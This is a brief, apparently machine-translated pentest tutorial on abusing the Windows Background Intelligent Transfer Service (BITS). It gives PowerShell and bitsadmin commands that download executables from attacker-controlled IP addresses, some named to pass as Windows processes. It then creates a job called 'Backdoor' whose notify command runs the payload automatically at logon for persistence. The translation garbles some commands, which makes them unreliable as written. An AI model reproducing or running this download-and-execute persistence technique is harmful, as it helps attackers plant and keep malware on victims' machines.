一、Bits Job
windows Background Intelligent Transfer Service Background Intelligent Transfer Service (BITS), HTTP, or SMB for file transfer; it can set the priority to the task and asynchronous download, the bandwidth of smart regulation, so as not to take up network resources for other applications.
Powershell and bitsadmin.exe can be used to create and manage Bits Job, Powershell but it seems only supports file transfers, windows native bitsadmin.exe program also supports the implementation of the code after the transfer is complete.
二、Execution
# PowerShell transfer files Start-BitsTransfer -Source http://192.168.240.135/csrss.exe - Destination C: \ the Users \ win10 \ Desktop \ csrss.exe # bitsadmin tool传输文件 bitsadmin /transfer test /download /priority high http://192.168.240.135/acrotray.exe C:\Users\win10\Desktop\acrotray.exe
The following method can be used to build a bitsjob, bitsjob performed automatically after the user interactive logon, unless complete or cancel it, the system will automatically cancel or 90 days. This will achieve the purpose of residing
# Executable file after downloading (python will take the simple httpserver 10054 error, this step is not local experiments) bitsadmin / the Create Backdoor bitsadmin /addfile backdoor "http://10.0.2.21/pentestlab.exe" "C:\tmp\pentestlab.exe" bitsadmin /SetNotifyCmdLine backdoor C:\tmp\pentestlab.exe NUL bitsadmin /resume backdoor # Completed or canceled bitsjob bitsadmin / Complete Backdoor bitsadmin /cancel backdoor